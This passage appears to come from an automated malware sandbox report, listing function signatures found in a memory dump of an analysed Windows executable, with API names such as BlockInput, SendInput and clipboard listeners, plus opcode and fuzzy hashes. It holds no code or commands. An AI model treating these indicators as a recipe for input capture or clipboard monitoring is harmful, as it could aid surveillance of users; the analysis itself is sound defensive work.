                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ProcessWindow$CountMessageTick$CloseHandleOpenPostSendTerminateThreadTimeout
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1366898224-0
                                                                                                                                                                              • Opcode ID: f4f923fb41292e7f3bc062a55cbf47a364f84cf842e49501d496acbbf6744f0d
                                                                                                                                                                              • Instruction ID: 2de54d127ff4ab1a9ea89d649ad0565ab81855e4aef54debd1d2036c21ede3b1
                                                                                                                                                                              • Opcode Fuzzy Hash: f4f923fb41292e7f3bc062a55cbf47a364f84cf842e49501d496acbbf6744f0d
                                                                                                                                                                              • Instruction Fuzzy Hash: 99018C32714B4083F75A6F23A8547EA22A1AB8CBC0F185538FB0647BB5EE38C9958740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Service$Database$CloseErrorHandleLastLockManagerOpenUnlock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2828566434-0
                                                                                                                                                                              • Opcode ID: bcd2d6bf93fd5efbc0dc177e629ef24e2e6ab0ed49ea474553fd752b7d2ab35c
                                                                                                                                                                              • Instruction ID: 810d6b9632852b0fb14260f894c1d77f3242f0f06b51f61f73978932a4f0a777
                                                                                                                                                                              • Opcode Fuzzy Hash: bcd2d6bf93fd5efbc0dc177e629ef24e2e6ab0ed49ea474553fd752b7d2ab35c
                                                                                                                                                                              • Instruction Fuzzy Hash: 6F014F3162579082EB5ECB63A41939963A4AB4CBD0F185025FB4A47BB8EF38C486C704
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$CloseHandleMessageOpenSendTerminateThreadTimeoutWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1181120299-0
                                                                                                                                                                              • Opcode ID: 10269afc2fcc4e45ad43c827a92e9137ea20018077fb9de502c78cc21ac041f0
                                                                                                                                                                              • Instruction ID: 1dd0b0385fa1981ea7fda8e881f6eaa9ccbc1787e1f99d176bbe1e32f74be820
                                                                                                                                                                              • Opcode Fuzzy Hash: 10269afc2fcc4e45ad43c827a92e9137ea20018077fb9de502c78cc21ac041f0
                                                                                                                                                                              • Instruction Fuzzy Hash: 57F04432715F8143FF6ADB27AD147966691BB8D7C1F085434AA0F43B74EF38C0458A01
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                              • Opcode ID: 8915ed985d46f897efdb59f48f5ac757c1f977d4abf12b727ee25b2f076bf1ba
                                                                                                                                                                              • Instruction ID: ce09eea12ee9771816f5663a3050589847fb1d184ab08d36b47d62e23fe534d7
                                                                                                                                                                              • Opcode Fuzzy Hash: 8915ed985d46f897efdb59f48f5ac757c1f977d4abf12b727ee25b2f076bf1ba
                                                                                                                                                                              • Instruction Fuzzy Hash: 8181AEB6A88A4086FB778FA796443E927B0E71E7C4F158015EB02576E1EB34CA50D702
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                              • Opcode ID: 8414905be89eae9157c4e16e20ab82a82e024b28db86c15792e68a2dfb60a952
                                                                                                                                                                              • Instruction ID: 0772dd126e63fe8e8e657f626fff741befafa2e8fa83a7a5f7f86201136587dd
                                                                                                                                                                              • Opcode Fuzzy Hash: 8414905be89eae9157c4e16e20ab82a82e024b28db86c15792e68a2dfb60a952
                                                                                                                                                                              • Instruction Fuzzy Hash: 8271AC7221065082EB769B1B9455FED62A1F78DBC0F854112FF9D476E5EB3CC8828700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ButtonCheckedLongShow
                                                                                                                                                                              • String ID: Submit
                                                                                                                                                                              • API String ID: 3251599074-949859957
                                                                                                                                                                              • Opcode ID: fabe9c2529be02be3a02164f8e33148237e8a0c279e6c2c6fbe15e36e413533c
                                                                                                                                                                              • Instruction ID: dc242e14d9ea7b89ed51297833e92c3817c90b5ab9d0151827543bf80303cd31
                                                                                                                                                                              • Opcode Fuzzy Hash: fabe9c2529be02be3a02164f8e33148237e8a0c279e6c2c6fbe15e36e413533c
                                                                                                                                                                              • Instruction Fuzzy Hash: 15519476200A8082EB62AF2BE54039DB7A1F7D9FD4F555202EF9A537A4CF39C945C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                                              • String ID: GetMonitorInfoW$user32
                                                                                                                                                                              • API String ID: 1646373207-1338042020
                                                                                                                                                                              • Opcode ID: f511e3e105a2fc9fe97c4d6da7720ec614d6fca74bccd97aff6484242ea6c079
                                                                                                                                                                              • Instruction ID: 93d8f5e369c3b7e85fef2bad63b41b0ced46a2e94abde6fcbeea3d83c8fc72fb
                                                                                                                                                                              • Opcode Fuzzy Hash: f511e3e105a2fc9fe97c4d6da7720ec614d6fca74bccd97aff6484242ea6c079
                                                                                                                                                                              • Instruction Fuzzy Hash: 36218071704640C2EB52CB2AEA903A933A0E75CB94F994125EB99477B5EF38C9D1C714
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassMessageNameSendTimeout
                                                                                                                                                                              • String ID: Combo$List
                                                                                                                                                                              • API String ID: 1632441287-1246219895
                                                                                                                                                                              • Opcode ID: 975b67d1cc2cf5d4dbeab7e05c40dd802a5b320a38dfa4e18d5727103b5209b5
                                                                                                                                                                              • Instruction ID: 2d5bd4b8fc0a97fc67ed647ddb94dc16cd8578d763a5a9c3f9736ce51444d93b
                                                                                                                                                                              • Opcode Fuzzy Hash: 975b67d1cc2cf5d4dbeab7e05c40dd802a5b320a38dfa4e18d5727103b5209b5
                                                                                                                                                                              • Instruction Fuzzy Hash: 89319432204B4486FB26CB22A4403ED27A1BB8D7F4F541316EB2903AF5CB7DC646D700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CountForegroundTextTick
                                                                                                                                                                              • String ID: N/A
                                                                                                                                                                              • API String ID: 3416458291-2525114547
                                                                                                                                                                              • Opcode ID: a6e5be6aa8ad19ace3c0f63cbd10eb13e9c16deed5b00477d85dbe3e896431e8
                                                                                                                                                                              • Instruction ID: 6b9ec1d44580a326509f5d32523bbc3d1935014de24f701a4b48f28a309a47f8
                                                                                                                                                                              • Opcode Fuzzy Hash: a6e5be6aa8ad19ace3c0f63cbd10eb13e9c16deed5b00477d85dbe3e896431e8
                                                                                                                                                                              • Instruction Fuzzy Hash: 0B316972214684C2EB16DB63E8A07E8B760FF5EB80F45912AFB49577B4DB78C055EB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassMessageNameSendTimeout
                                                                                                                                                                              • String ID: Combo$List
                                                                                                                                                                              • API String ID: 1632441287-1246219895
                                                                                                                                                                              • Opcode ID: 6063d62766b85774f2a0b8ade889090ac7adaa829db27e74d432654c5e09a204
                                                                                                                                                                              • Instruction ID: e6abcf1758686aff88d5f5b96f91cf28832d97396dba2b8425e77809533ee7a4
                                                                                                                                                                              • Opcode Fuzzy Hash: 6063d62766b85774f2a0b8ade889090ac7adaa829db27e74d432654c5e09a204
                                                                                                                                                                              • Instruction Fuzzy Hash: 27317432214A8486FB66CB22E4407ED2762AB8D7F8F541316EB2903BF5CB7DC646D700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FullNamePath
                                                                                                                                                                              • String ID: \$\
                                                                                                                                                                              • API String ID: 608056474-164819647
                                                                                                                                                                              • Opcode ID: ee806573cbceeccad63ffcd6bd4757052147a6dd204b5ca47ba79b3390db096b
                                                                                                                                                                              • Instruction ID: b449378c4673b10035b703cdbbd97067bfc236ab606d532076fa724863a5f5ac
                                                                                                                                                                              • Opcode Fuzzy Hash: ee806573cbceeccad63ffcd6bd4757052147a6dd204b5ca47ba79b3390db096b
                                                                                                                                                                              • Instruction Fuzzy Hash: 03317A32208BC591DA71CB11E4407DAB371F788798F944612EB9D43AA8DF3CC68ACB90
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AcquireLock$AddressCriticalHandleLeaveModuleProcSection
                                                                                                                                                                              • String ID: BlockInput$user32
                                                                                                                                                                              • API String ID: 242699652-2744593370
                                                                                                                                                                              • Opcode ID: 4fdb8daa877cb16a893c4067476ac26ed4a4c2599a2f864d287b86fb6aecfdd6
                                                                                                                                                                              • Instruction ID: 1816a46fbccca5c273b47c250705cbe078f9c6ae686fb166674fb12802326e7d
                                                                                                                                                                              • Opcode Fuzzy Hash: 4fdb8daa877cb16a893c4067476ac26ed4a4c2599a2f864d287b86fb6aecfdd6
                                                                                                                                                                              • Instruction Fuzzy Hash: C6012CB5301A50C2EA16FB2BE8A03D53360A76CB92F440125AB5D877F1EF38C88AD711
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                                              • String ID: SendInput$user32
                                                                                                                                                                              • API String ID: 1646373207-2278465184
                                                                                                                                                                              • Opcode ID: 1fed0c9193589a4ceaf0bead44abff6c4cc8cfba1c106c490be916a7b9eb20ec
                                                                                                                                                                              • Instruction ID: a307116f2aeb73140a9c59e96505630dc3b507579477d8c410e9f8761428541c
                                                                                                                                                                              • Opcode Fuzzy Hash: 1fed0c9193589a4ceaf0bead44abff6c4cc8cfba1c106c490be916a7b9eb20ec
                                                                                                                                                                              • Instruction Fuzzy Hash: 0DD0C938612E40C1EA0ABB03EC643DA2260BB4C790FC00422D64E03730EF3C819BC310
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                                              • String ID: RemoveClipboardFormatListener$user32
                                                                                                                                                                              • API String ID: 1646373207-262861245
                                                                                                                                                                              • Opcode ID: 8c4e34b235507069c337900ae72491b33a58aead9bfbbd5ad25567392348ba19
                                                                                                                                                                              • Instruction ID: ce72f567ee8c3033e459a9cd2b53766cacf05e4fc62a8a6439c235c6d56fa659
                                                                                                                                                                              • Opcode Fuzzy Hash: 8c4e34b235507069c337900ae72491b33a58aead9bfbbd5ad25567392348ba19
                                                                                                                                                                              • Instruction Fuzzy Hash: 3ED0C934612E40D1E60ABB13ECA43D622A0B74C790F800411E64E03731EF3C859AC300
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                                              • String ID: AddClipboardFormatListener$user32
                                                                                                                                                                              • API String ID: 1646373207-221531295
                                                                                                                                                                              • Opcode ID: 1d540dd559172a5b90575b43287fcda6b349ec9434e69bb76cb3f3249fe6bf78
                                                                                                                                                                              • Instruction ID: fcef42757a0849afe3c61ded7f87806618e175f949365c13eae2a4eacccee3db
                                                                                                                                                                              • Opcode Fuzzy Hash: 1d540dd559172a5b90575b43287fcda6b349ec9434e69bb76cb3f3249fe6bf78
                                                                                                                                                                              • Instruction Fuzzy Hash: DBD0C934611F40C1E60ABB13EC643D62270B74C790FC00411E64E03731EF3C859B8700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Unregister$RegisterTimer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1006365865-0
                                                                                                                                                                              • Opcode ID: e79b2e4c653b0279ed9586e45cf1ea671b5223d02d9ea161a21a28ae773a4446
                                                                                                                                                                              • Instruction ID: 490d8edbca9477493e95159896f77fbb304d8ee30b181de2277da5e7cf724023
                                                                                                                                                                              • Opcode Fuzzy Hash: e79b2e4c653b0279ed9586e45cf1ea671b5223d02d9ea161a21a28ae773a4446
                                                                                                                                                                              • Instruction Fuzzy Hash: 3DF18CF2608A8485FB77CB27A5443E93BE4E35ABC8F08404AEB84076F1DB79C5A5D741
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
